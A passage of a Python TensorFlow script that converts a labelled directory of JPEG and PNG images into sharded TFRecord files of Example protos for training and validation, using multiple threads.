Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.